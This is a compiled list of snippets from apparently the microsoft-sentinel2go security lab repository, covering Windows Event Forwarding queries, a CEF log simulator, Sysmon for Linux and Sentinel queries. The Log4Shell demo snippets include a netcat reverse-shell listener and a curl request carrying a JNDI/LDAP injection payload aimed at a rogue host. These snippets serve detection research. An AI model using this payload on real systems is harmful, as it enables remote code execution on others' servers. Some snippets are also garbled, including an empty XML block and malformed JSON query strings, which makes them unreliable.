### Example XPath Query Output
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
An example of the output format generated by the XPath query export script. This string represents a formatted query suitable for certain Windows event collection configurations.
```Text
Security!*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and (Level=4 or Level=0) and EventID=4740]]
```
--------------------------------
### Read Account-Lockout.xml Example
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
Loads the 'Account-Lockout.xml' file as an XML object and displays its inner XML content. This is useful for inspecting the structure of a specific WEF query definition.
```PowerShell
[xml]$Account = get-content .\Account-Lockout.xml
$Account.InnerXml
```
--------------------------------
### Start Netcat Listener
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Initiate a netcat listener on a specified port to capture incoming connections. This is used here to receive a reverse shell.
```bash
nc -lvnp 443
```
--------------------------------
### CEF Simulator Debug Log Output
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
This is an example of the output found in the cef_simulator_debug.log file, showing the parsing and sending of a custom CEF event.
```text
05/26/2021 08:39:49 AM -----------------------
05/26/2021 08:39:49 AM Parsing a custom sample event..
05/26/2021 08:39:49 AM Reading CEF event samples..
05/26/2021 08:39:49 AM Parsing replace file..
05/26/2021 08:39:49 AM Values to replace: {'SRCTESTIP': '1.2.3.4', 'DSTTESTIP': '10.0.0.1'}
05/26/2021 08:39:49 AM CEF Server: 127.0.0.1
05/26/2021 08:39:49 AM CEF Port: 514
05/26/2021 08:39:49 AM -----------------------
05/26/2021 08:39:49 AM Sending event: PAN Morto RDP Request
05/26/2021 08:39:49 AM Setting current datetime: May 26 2021 08:39:49 ..
05/26/2021 08:39:49 AM Replacing value SRCTESTIP with 1.2.3.4
05/26/2021 08:39:49 AM Replacing value DSTTESTIP with 10.0.0.1
05/26/2021 08:39:49 AM Sending the following message: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=May 26 2021 08:39:49 deviceExternalId=RANDOMID src=1.2.3.4 dst=10.0.0.1 sourceTranslatedAddress=10.0.0.1 destinationTranslatedAddress=1.2.3.4 cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0|data1=example..
05/26/2021 08:39:49 AM Executing the following command: ['logger', '-p', 'local4.warn', '-t', 'CEF:', '0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=May 26 2021 08:39:49 deviceExternalId=RANDOMID src=1.2.3.4 dst=10.0.0.1 sourceTranslatedAddress=10.0.0.1 destinationTranslatedAddress=1.2.3.4 cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0|data1=example', '-P', '514', '-n', '127.0.0.1']..
```
--------------------------------
### Account Lockout WEF Query Example
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
An example XML query definition for capturing account lockout events (Event ID 4740) from the Security log on Windows Domain Controllers. This query is designed to be used with Windows Event Forwarding.
```XML
```
--------------------------------
### Custom CEF Message Example
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
An example of a custom CEF message for Palo Alto Networks PAN-OS. This message details a 'Morto RDP Request Traffic' event.
```cef
0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0
```
--------------------------------
### Check Sysmon Service Status
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md
Verify if the Sysmon service is running on a Linux machine. This command is useful for confirming a successful installation.
```bash
systemctl status sysmon
```
--------------------------------
### Trigger Log4Shell Vulnerability
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Send a crafted HTTP GET request with a malicious User-Agent header to a vulnerable application to exploit CVE-2021-44228.
```bash
curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 127.0.0.1:8080/Log4j-2.14.0-SNAPSHOT/api
```
--------------------------------
### Download OSSEM ATT&CK Mapping File (PowerShell)
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Initializes a WebClient, sets the security protocol to TLS 1.2, and downloads the specified JSON mapping file to the current directory.
```PowerShell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$wc = new-object System.Net.WebClient)
$wc.DownloadFile($uri, "techniques_to_events_mapping.json")
```
--------------------------------
### Create CEF Sample YAML File
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Use a text editor like 'nano' to create a YAML file for your CEF sample. This file will contain the custom CEF message.
```bash
nano paloAltoMortoRDPRequest.yaml
```
--------------------------------
### Query Sysmon Process Creation Events using ASIM Parser
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md
Retrieve the latest 10 process creation events from Sysmon for Linux using the VimProcessCreateLinuxSysmon ASIM parser in Microsoft Sentinel. This leverages normalized data for easier querying.
```kql
VimProcessCreateLinuxSysmon
| limit 10
```
--------------------------------
### Run CEF Simulator
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Execute the cef_simulator.py script with your sample event file and replacement values file. The --debug flag provides verbose output.
```bash
python3 cef_simulator.py -e paloAltoMortoRDPRequest.yaml -r cef_replace.yaml --debug
```
--------------------------------
### Accept Azure VM Marketplace Terms
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Win10-PAN-FW/README.md
Execute this Azure CLI command to accept the legal terms for the Palo Alto Networks VM-Series firewall 'bundle2' with version '7.1.1'. This is a prerequisite for deploying the VM from the Azure Marketplace.
```bash
az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1
```
--------------------------------
### List Azure VM Images
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Win10-PAN-FW/README.md
Use this Azure CLI command to list all available VM images for Palo Alto Networks VM-Series firewall, specifically for the 'bundle2' SKU. This helps identify the correct URN for accepting terms.
```bash
az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn'
```
--------------------------------
### Navigate to Script Directory
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Change the current directory to the location where custom scripts are downloaded. This is typically '/var/lib/waagent/custom-script/download/0'.
```bash
cd /var/lib/waagent/custom-script/download/0
```
--------------------------------
### Switch to Admin User
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
After SSHing into the CEF VM, switch to the root user using sudo su. This is necessary for executing administrative commands.
```bash
sudo su
root@CEF-SYSLOG:/home/#
```
--------------------------------
### Create Replacement Values YAML File
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Create a YAML file to specify values that will replace placeholders in the CEF message. Use 'nano' for file creation.
```bash
nano cef_replace.yaml
```
--------------------------------
### List Running Docker Containers
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Use this command to see all currently running Docker containers on the system.
```bash
docker ps
```
--------------------------------
### Export Queries from WEF Subscriptions
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
Iterates through all XML files in the current directory, parses them as WEF subscriptions, extracts the CDATA query content, and saves each query to a separate file in a 'Queries' subdirectory. This script helps in organizing and extracting individual queries from subscription files.
```PowerShell
$all = Get-ChildItem *.xml
ForEach ( $file in $all){
$fileName = Split-Path $file -Leaf
[xml]$subscription = get-content $file
[xml]$xmlContent = $subscription.Subscription.Query.'#cdata-section'
$StringWriter = New-Object System.IO.StringWriter
$XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter
$xmlWriter.Formatting = "indented"
$xmlWriter.Indentation = 2
$xmlWriter.IndentChar = ' '
$xmlContent.WriteContentTo($XmlWriter)
$XmlWriter.Flush()
$StringWriter.Flush()
$StringWriter.ToString() | out-file "Queries\$fileName"
}
```
--------------------------------
### View Docker Container Logs
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Follow the logs of a specific Docker container in real-time. Replace 'rogue-jndi' with the actual container name.
```bash
docker logs --follow rogue-jndi
```
--------------------------------
### Prepare Request Parameters
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md
Defines the parameters for the Invoke-RestMethod cmdlet, including the URI, method, request body converted to JSON, and content type.
```PowerShell
$params = @{
Uri = $orchestrator
Method = "Post"
Body = $shippingRequest | Convertto-json -Depth 10
ContentType = 'application/json'
Verbose = $true
}
```
--------------------------------
### SSH into CEF VM
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Connect to your CEF virtual machine using SSH. Replace placeholders with your actual username and public IP address.
```bash
ssh @
```
--------------------------------
### Run XML Query with Get-WinEvent
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
Executes a previously loaded XML query using the Get-WinEvent cmdlet. This allows for testing and retrieving events directly from the command line based on the defined XML filter.
```PowerShell
Get-WinEvent -FilterXml $Account
```
--------------------------------
### Clone Palantir WEF Repository
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
Clones the official Palantir Windows Event Forwarding repository and navigates to the WEF subscription directory. This is the initial step for using the provided scripts.
```PowerShell
git clone https://github.com/palantir/windows-event-forwarding
cd windows-event-forwarding/wef-subscription
```
--------------------------------
### Explore Sysmon Events with sysmonLogView
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md
View Sysmon event ID 1 (ProcessCreate) events in a formatted way using the sysmonLogView utility. This command pipes Syslog output to sysmonLogView for filtering.
```bash
sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1
```
--------------------------------
### Enable SCX Verbose Logging
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md
Use this command to set all SCX logging levels to verbose. This is useful for detailed debugging and troubleshooting.
```bash
/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose
```
--------------------------------
### Generate Data Sources JSON for Windows Event Logs
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
This script iterates through all XML files in the current directory, extracts XPath queries, and constructs a JSON object defining data sources for Windows Event Logs. The output is saved to 'ossem-attack.json'.
```PowerShell
$allFiles = Get-ChildItem -Path *.xml
$AllDataSources = @()
$DataSource = [ordered]@{}
# Name of Data Source
$DataSource['Name'] = "eventLogsDataSource"
# Transfer Period
$DataSource['scheduledTransferPeriod'] = "PT1M"
# Streams
$DataSource['streams'] = @(
"Microsoft-SecurityEvent"
)
# Process XPath Queries
$DataSource['xPathQueries'] = @()
foreach ($file in $allFiles){
[xml]$XmlQuery = Get-Content -path $file
$queries = $xmlQuery.QueryList.Query
ForEach ($query in $queries){
$QueryString = "$(-join ($query.Select.Path, '!', $query.Select.'#text'))"
if ("$QueryString" -notin $DataSource['xPathQueries']){
$DataSource['xPathQueries'] += $QueryString
}
}
}
$AllDataSources += $DataSource
@{
windowsEventLogs = $AllDataSources
} | Convertto-Json -Depth 4 | ForEach-Object { [System.Text.RegularExpressions.Regex]::Unescape($_) } | Set-Content "ossem-attack.json"
```
--------------------------------
### CEF Sample YAML Content
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Paste the custom CEF message into the 'event' field of your YAML file. This configures the event details for the simulator.
```yaml
name: PAN Morto RDP Request
platform: Palo Alto Networks
priority:
facility: local4
level: warn
event: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0
```
--------------------------------
### Inspect CEF Simulator Debug Log
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Use the 'cat' command to view the contents of the cef_simulator_debug.log file, which contains detailed information about the CEF event processing.
```bash
cat cef_simulator_debug.log
```
--------------------------------
### Display First Mapping Object (PowerShell)
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Selects and displays the first object from the loaded JSON mappings array for a quick test.
```PowerShell
$mappings[0]
```
--------------------------------
### Explore Syslog Events
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md
Monitor real-time Syslog events in the /var/log/Syslog file. This command is helpful for observing system-level messages as they occur.
```bash
tail –f /var/log/Syslog
```
--------------------------------
### Generate XML Query Files from PowerShell Hash Table
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
This script takes the prepared hash table of security events and generates individual XML query files for each data source. It uses `System.Xml.XmlTextWriter` to create indented XML with comments and query elements, including filtering logic for specific events. The generated files are saved with names derived from the data source.
```PowerShell
foreach ($ds in $allMappings.Keys){
$fileName = -join (($ds -replace " ","-").ToLower(), '.xml')
$StringWriter = New-Object System.IO.StringWriter
$XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter
$xmlWriter.Formatting = "indented"
$xmlWriter.Indentation = 2
$xmlWriter.IndentChar = ' '
$xmlWriter.WriteStartDocument()
$xmlWriter.WriteStartElement("QueryList")
$xmlWriter.WriteComment("ATT&CK Data Source - $ds")
$Counter = 0
foreach ($dc in $allMappings[$ds].Keys) {
# Create query element
$xmlWriter.WriteStartElement("Query")
$xmlWriter.WriteAttributeString("Id", "$Counter")
$xmlWriter.WriteAttributeString("Path", "Security")
$xmlWriter.WriteComment("ATT&CK Data Component - $dc")
# Create query strings
$query = ""
$leftover = @()
foreach ($event in $allMappings[$ds][$dc]){
$xmlWriter.WriteComment("$($Event.EventID) - $($Event.EventName)")
if ($Event.Filters){
$leftover += $Event
}
else {
$query = -join ($query, " EventID=$($Event.EventID) ")
if (!($allMappings[$ds][$dc][-1]['EventID'] -eq $($Event.EventID))){
$query = -join ($query, "or")
}
}
}
if ($allMappings[$ds][$dc].Count -ne $leftover.Count){
$query = $query.Trim()
$query = -join ("*[System[( ", $query, ")]]")
if ($leftover.Count -ne 0){
$query = -join ($query, ' or ')
}
}
# Process leftover
if ($leftover){
foreach ($l in $leftover){
$query = -join ($query, "(*[System[EventID=$($l.EventID)]] and (")
foreach ($f in $l.Filters) {
$key = $f | get-member -MemberType NoteProperty | select -expandproperty Name
$query = -join ($query, "(*[EventData[Data[@Name='$($key)']='$($f.$key)'")
if (!($l.Filters[-1] -eq $($f))){
$query = -join ($query, "]] or ")
}
else {
$query = -join ($query, "]]))) ")
}
}
if (!($leftover[-1] -eq $($l))){
$query = -join ($query, " or ")
}
}
}
# Create Select (query) Element
$xmlWriter.WriteStartElement("Select")
$xmlWriter.WriteAttributeString("Path", "Security")
$xmlWriter.WriteString("$query")
$xmlWriter.WriteEndElement() | out-null
$xmlWriter.WriteEndElement() | out-null
$counter += 1
}
# Write Close Tag for QueryList Element
$xmlWriter.WriteEndDocument() | out-null
# Finish The Document
$xmlWriter.Flush() | out-null
$StringWriter.Flush() | out-null
#Create File
$StringWriter.ToString() | out-file $fileName
$xmlWriter.Close()
}
```
--------------------------------
### Prepare Request Body
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md
Constructs the JSON payload for the request, specifying the title, destination, and dataset details including the event log URL and source name.
```PowerShell
$SimulationRequest = @{
title = 'Proof of Concept'
destination = 'AzureLogAnalytics'
datasets = @(
@{
number = 1
eventLogUrl = 'https://github.com/OTRF/Security-Datasets/raw/SecurityDatasets2.0/datasets/atomic/windows/190518-RegKeyModification-WDigestDowngrade/WORKSTATION6_Windows_Security.zip'
eventSourceName = 'Microsoft-Windows-Security-Auditing'
}
)
}
```
--------------------------------
### Monitor SCX Log Output
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md
This command tails the SCX log file in real-time. It is helpful for observing log messages as they are generated.
```bash
tail -f /var/opt/microsoft/scx/log/scx.log
```
--------------------------------
### Load and Display Windows Registry XML Query
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Loads an XML file containing Windows registry queries into a PowerShell variable and displays its inner XML content. This is useful for inspecting the structure of the query file.
```PowerShell
[xml]$registry = Get-Content .\windows-registry.xml
$registry.innerXml
```
--------------------------------
### Replacement Values YAML Content
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
Define key-value pairs in this YAML file to substitute specific placeholders like IP addresses within the CEF message.
```yaml
SRCTESTIP: 1.2.3.4
DSTTESTIP: 10.0.0.1
```
--------------------------------
### View OMS Auditd Configuration
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Display the contents of the AUOMS configuration file to check its active settings.
```bash
cat /etc/audisp/plugins.d/auoms.conf
```
--------------------------------
### Read JSON Mapping File (PowerShell)
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Reads the downloaded JSON mapping file and converts its content into a PowerShell object.
```PowerShell
$mappings = Get-Content .\techniques_to_events_mapping.json | ConvertFrom-Json
```
--------------------------------
### Define OSSEM ATT&CK Mapping URI (PowerShell)
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Sets a variable to the URI of the OSSEM DM relationships mapped to ATT&CK JSON file.
```PowerShell
$uri = "https://raw.githubusercontent.com/OTRF/OSSEM-DM/main/use-cases/mitre_attack/techniques_to_events_mapping.json"
```
--------------------------------
### CEF Simulator ASCII Art
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
This section displays the ASCII art for the CEF simulator tool.
```text
_________ ______________________
\_ ___ \ \_ _____/\_ _____/
/ \ \/ | __)_ | __)
\ \____ | \ | \
\______ //_______ / \___ /
\/ \/ \/
_________.____ .__ __
/ _____/|__| _____ __ __ | | _____ _/ |_ ____ _______
\_____ \ | | / \ | | \| | \__ \ \ __\/ _ \\_ __ \
/ \| || Y Y \| | /| |__ / __ \ | | ( <_> )| | \/
/_______ /|__||__|_| /|____/ |____/(____ /|__| \____/ |__| V0.1
Creator: Roberto Rodriguez @Cyb3rWard0g
License: GPL-3.0
-----------------------
CEF Server: 127.0.0.1
CEF Port: 514
-----------------------
Sending event: PAN Morto RDP Request
```
--------------------------------
### Check Tomcat Service Status
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Use this command to verify if the Tomcat service is running on an Ubuntu system.
```bash
service tomcat status
```
--------------------------------
### Query Sysmon for Linux Events in Microsoft Sentinel
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md
Analyze Sysmon for Linux logs stored in the Syslog table within Microsoft Sentinel. This Kusto query parses XML messages to extract EventID and EventData for summarization.
```kql
Syslog
| extend EventID = parse_xml(SyslogMessage).Event.System.EventID
| extend EventData = parse_xml(SyslogMessage).Event.EventData.Data
| mv-expand bagexpansion=array EventData
| evaluate bag_unpack(EventData)
| extend Key=tostring(['@Name']), Value=['#text']
| evaluate pivot(
Key, any(Value), TimeGenerated, TenantId, SourceSystem,
EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId
)
| summarize count() by tostring(EventID)
```
--------------------------------
### Copy PCAP File from Azure VM
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
This command allows you to securely copy the captured PCAP file from your Azure VM to your local machine using SCP. Replace 'user', 'x.x.x.x', and the local path with your specific details.
```bash
scp user@x.x.x.x:/home/user/log4jShell.pcap C:\Users\YOU\Downloads\
```
--------------------------------
### Export XPath Query for Windows Security Events
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md
Extracts and formats XPath queries from a loaded WEF subscription object. It combines the 'Path' and the '#text' content of the 'Select' element, separated by '!'. This is useful for configuring Windows Security Events Connector.
```PowerShell
$Account.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') }
```
--------------------------------
### Windows Security Events XPath Queries
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
A JSON configuration snippet listing XPath queries for collecting various Windows Security Events. These queries are used to define which events are ingested by the Microsoft Sentinel Windows Security Events Connector.
```json
{
"windowsEventLogs": [
{
"Name": "eventLogsDataSource",
"scheduledTransferPeriod": "PT1M",
"streams": [
"Microsoft-SecurityEvent"
],
"xPathQueries": [
"Security!*[System[(EventID=5136 or EventID=5139)]]",
"Security!*[System[(EventID=5137)]]",
"Security!*[System[(EventID=5141)]]",
"Security!*[System[(EventID=4662 or EventID=4661)]]",
"Security!*[System[(EventID=4768 or EventID=4769)]]",
"Security!*[System[(EventID=4688)]]",
"Security!*[System[(EventID=4660)]]",
"Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='File']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='File']])))" or (*[System[EventID=4661]] and ((*[EventData[Data[@Name='ObjectType']='SAM']]))) ",
"Security!*[System[(EventID=4670)]]",
"Security!*[System[(EventID=4624 or EventID=4778 or EventID=4964)]]",
"Security!*[System[(EventID=5140 or EventID=5145)]]",
"Security!*[System[(EventID=5154 or EventID=5159 or EventID=5155 or EventID=5158 or EventID=5156 or EventID=5157 or EventID=5031)]]",
"Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))",
"Security!*[System[(EventID=4689)]]",
"Security!*[System[(EventID=4698)]]",
"Security!*[System[(EventID=4701 or EventID=4700 or EventID=4702)]]",
"Security!*[System[(EventID=4697)]]",
"Security!*[System[(EventID=4725 or EventID=4722 or EventID=4717 or EventID=4740 or EventID=4738 or EventID=4781 or EventID=4767 or EventID=4718)]]",
"Security!*[System[(EventID=4624 or EventID=4625 or EventID=4648)]]",
"Security!*[System[(EventID=4726)]]",
"Security!*[System[(EventID=4720)]]",
"Security!*[System[(EventID=4670 or EventID=4657)]]",
"Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))"
]
}
]
}
```
--------------------------------
### Send Request to Orchestrator
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md
Executes the HTTP POST request to the Azure Function orchestrator using the prepared parameters.
```PowerShell
Invoke-RestMethod @params
```
--------------------------------
### Extract and Format XPath Queries from XML
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Parses an XML file containing event queries, extracts the Path and Select text, formats them into a specific string, and collects unique queries. This script is used to prepare queries for data collection rules.
```PowerShell
[xml]$registry = Get-Content .\windows-registry.xml
$registry.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') }
```
